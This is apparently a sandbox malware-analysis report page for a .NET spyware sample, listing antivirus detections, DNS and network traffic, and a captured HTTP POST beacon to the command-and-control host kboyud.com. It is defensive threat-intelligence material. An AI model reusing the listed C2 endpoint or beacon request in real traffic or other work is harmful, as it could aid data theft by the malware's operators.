TrendMicro-HouseCall	TrojanSpy.MSIL.NEGASTEAL.THIADBO
Yandex	Trojan.Kryptik!rzjbZGnoquA
SentinelOne	DFI - Malicious PE
eGambit	Unsafe.AI_Score_96%

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)

dead_host	172.217.24.14:443
dead_host	172.217.160.110:443

暂无二进制图像该样本未生成二进制可视化图像

暂无运行截图该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手，可以帮您分析和解读恶意软件报告。请随时向我提问！

🔍 主要威胁分析

⚡ 行为特征

🛡️ 防护建议

🔧 技术手段

🎯 检测方法

🤖

Static Analysis
Strings

PE Compile Time

2020-08-13 01:44:24

Imports

Library mscoree.dll:

• 0x402000 _CorExeMain

Hosts

No hosts contacted.

DNS

Name	Response	Post-Analysis Lookup
time.windows.com	A 20.189.79.72 CNAME time.microsoft.akadns.net
dns.msftncsi.com	A 131.107.255.255	131.107.255.255
kboyud.com	A 52.6.206.192	52.6.206.192
clients2.google.com	A 172.217.160.110 CNAME clients.l.google.com	172.217.160.78
dns.msftncsi.com	AAAA fd3e:4f5a:5b81::1	131.107.255.255
teredo.ipv6.microsoft.com		127.0.0.1

TCP

Source	Source Port	Destination	Destination Port
192.168.56.101	49181	52.6.206.192 kboyud.com	80

UDP

Source	Source Port	Destination	Destination Port
192.168.56.101	50534	114.114.114.114	53
192.168.56.101	50568	114.114.114.114	53
192.168.56.101	51963	114.114.114.114	53
192.168.56.101	55368	114.114.114.114	53
192.168.56.101	60123	114.114.114.114	53
192.168.56.101	60384	114.114.114.114	53
192.168.56.101	137	192.168.56.255	137
192.168.56.101	138	192.168.56.255	138
192.168.56.101	123	20.189.79.72 time.windows.com	123
192.168.56.101	49713	224.0.0.252	5355
192.168.56.101	51378	224.0.0.252	5355
192.168.56.101	51808	224.0.0.252	5355
192.168.56.101	53237	224.0.0.252	5355
192.168.56.101	56804	224.0.0.252	5355
192.168.56.101	62191	224.0.0.252	5355
192.168.56.101	62318	224.0.0.252	5355
192.168.56.101	63429	224.0.0.252	5355
192.168.56.101	65004	224.0.0.252	5355
192.168.56.101	1900	239.255.255.250	1900
192.168.56.101	51379	239.255.255.250	3702

HTTP & HTTPS Requests

URI	Data
http://kboyud.com/doc/five/fre.php	POST /doc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kboyud.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 82EF314 Content-Length: 196 Connection: close

URI

Data

http://kboyud.com/doc/five/fre.php

POST /doc/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kboyud.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 82EF314
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.

Sorry! No dropped buffers.